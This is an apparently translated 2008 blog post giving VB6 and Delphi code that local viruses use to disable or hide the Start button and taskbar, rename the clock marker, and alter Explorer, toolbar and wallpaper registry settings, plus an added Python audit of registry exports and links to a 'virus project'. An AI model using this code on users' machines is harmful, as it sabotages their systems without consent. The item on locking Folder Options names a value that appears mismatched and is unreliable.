Tuesday, November 18, 2008

VIRUSES THAT CHANGE THE APPEARANCE OF THE TASKBAR, TOOLBAR & DESKTOP

Many local viruses are appearing these days, written in various languages and behaving in various ways when they scramble the registry, but most of these local viruses alter the Taskbar, the Toolbar and the Desktop.

On the Taskbar, one of the things a virus does is:

1. Making the Start menu lose its function

This virus consists of 1 form; the code:

Option Explicit

'Win32 API functions used
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function Putfocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function LockWindowUpdate Lib "user32" (ByVal hwndLock As Long) As Long
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Function WindowFromPoint Lib "user32" (ByVal xPoint As Long, ByVal yPoint As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowPlacement Lib "user32" (ByVal hwnd As Long, lpwndpl As WINDOWPLACEMENT) As Long

'Constants used with the Win32 API functions
Private Const HWND_NOTOPMOST = -2
Private Const HWND_TOPMOST = -1

'Types used by the Win32 API functions
Private Type POINTAPI
    x As Long
    y As Long
End Type

Private Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type

Private Type WINDOWPLACEMENT
    Length As Long
    flags As Long
    showCmd As Long
    ptMinPosition As POINTAPI
    ptMaxPosition As POINTAPI
    rcNormalPosition As RECT
End Type

Dim hand1 As Long
Dim hand2 As Long
Dim sz As WINDOWPLACEMENT

Private Sub Form_Load()
    hand1 = FindWindow("Shell_TrayWnd", vbNullString)
    hand2 = FindWindowEx(hand1, 0&, "Button", vbNullString)
    GetWindowPlacement hand2, sz
    SetParent hand2, 0
    Putfocus hand2
    SetWindowPos hand2, HWND_TOPMOST, 0, ((Screen.Height / Screen.TwipsPerPixelY) - (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top)) + 1, (sz.rcNormalPosition.Right - sz.rcNormalPosition.Left), (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top), 0
    LockWindowUpdate False
End Sub

'by:rieysha
'-------------------end cut-------------------------





2. Making the Start menu disappear

Open Delphi 7, double-click inside the form, then write:

// 5 = GW_CHILD, 0 = SW_HIDE
ShowWindow(GetWindow(FindWindow('Shell_TrayWnd', nil), 5), 0);

Then click Run (F9).

3. Making the Taskbar disappear

Open Delphi 7, double-click inside the form, then write:

var
  hTaskBar: THandle;
begin
  hTaskBar := FindWindow('Shell_TrayWnd', nil);
  ShowWindow(hTaskBar, SW_HIDE);
end;

Then click Run (F9).



4. Changing the clock display to the name of the virus

In Delphi, write:

Reg.RootKey := HKEY_CURRENT_USER;
Reg.OpenKey('\Control Panel\International', true);
Reg.WriteString('s1159', 'rieysha');

In Visual Basic 6.0:

cek = AmbilString(HKCU, "Control Panel\International\s1159", "rieysha")
If cek = "" Then
    BuatString HKCU, "Control Panel\International", "s1159", "rieysha"
End If ' s1159=AM, s2359=PM



5. Locking Folder Options in the Tools menu of the toolbar

The method is the same as above; the only part that changes is HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, where a new DWORD named BackBitmap is created with the value 1.

6. Changing the toolbar so that it shows a picture

The method is the same as above; the only part that changes is Software\Microsoft\Internet Explorer\Toolbar, under either HKCU or HKLM, where a new string named BackBitmap is created with the value C:\WINDOWS\Greenstone.bmp



7. Changing the picture on the desktop

In Delphi it only takes setting the registry:

Reg.RootKey := HKEY_CURRENT_USER;
Reg.OpenKey('\Control Panel\Desktop', true);
Reg.WriteString('Wallpaper', 'C:\Windows\Blue Rivets.bmp');
Reg.Free;
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, nil, SPIF_SENDWININICHANGE);
// sets the desktop background to Blue Rivets.bmp

Or, more commonly, a local virus sets the desktop background to the virus's own picture. That picture is actually stored inside the body of the virus and is extracted when the virus is run.



That is probably all I can explain for now about what local viruses usually do. Hopefully, by knowing which parts of the registry a virus changes, you can also restore the registry to its original state.
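Added example, not part of the original post or its project: a Python audit of a `reg export` text dump for the registry values listed in items 4 to 7, so the altered entries can be found and put back. The sample export, the function names parse_reg and audit, and the AM/PM allow-list are assumptions; the Policies\Explorer rule flags any value set to 1 instead of looking for one particular name.

```python
import re
# Constructed `reg export` text, not from a real host; NoDriveTypeAutoRun is a benign control value.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\International]
"s1159"="rieysha"
"s2359"="PM"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"BackBitmap"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"BackBitmap"="C:\\WINDOWS\\Greenstone.bmp"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"="C:\\Windows\\Blue Rivets.bmp"
'''
HKCU, HKLM = 'hkey_current_user\\', 'hkey_local_machine\\'
MARKERS = {'s1159': {'AM', ''}, 's2359': {'PM', ''}}  # assumption: en-US defaults

def unescape(s):
    return re.sub(r'\\(.)', r'\1', s)  # .reg strings escape \ and " with a backslash

def parse_reg(text):
    """Return {key: {value_name: str | int}}, names lowercased; strings and DWORDs only."""
    tree, cur = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith('[') and line.endswith(']'):
            cur = tree.setdefault(line[1:-1].lower(), {})
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if m and cur is not None:
            name, raw = unescape(m.group(1)).lower(), m.group(2)
            if raw.startswith('dword:'):
                cur[name] = int(raw[6:], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                cur[name] = unescape(raw[1:-1])
    return tree

def audit(tree):
    """Return (value_name, data, reason) for each setting the post says gets altered."""
    out = []
    intl = tree.get(HKCU + 'control panel\\international', {})
    out += [(n, intl[n], 'AM/PM clock marker replaced') for n, ok in MARKERS.items()
            if n in intl and intl[n] not in ok]
    pol = tree.get(HKCU + 'software\\microsoft\\windows\\currentversion\\policies\\explorer', {})
    out += [(n, v, 'Explorer policy value set to 1') for n, v in pol.items() if v == 1]
    for hive in (HKCU, HKLM):
        tb = tree.get(hive + 'software\\microsoft\\internet explorer\\toolbar', {})
        if 'backbitmap' in tb:
            out.append(('backbitmap', tb['backbitmap'], 'toolbar bitmap set'))
    wp = tree.get(HKCU + 'control panel\\desktop', {}).get('wallpaper')
    return out + ([('wallpaper', wp, 'wallpaper path to review')] if wp else [])
```

The wallpaper entry is reported for review, not as a verdict, because a legitimate user setting looks the same in the export.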

download tutorial
http://www.4shared.com/file/69104541/5393bdaa/VIRUSubahTAMPILAN.html

download project
http://www.4shared.com/file/69106944/80ea78ca/ProjectVirusUbahTampilan.html


By:rieysha
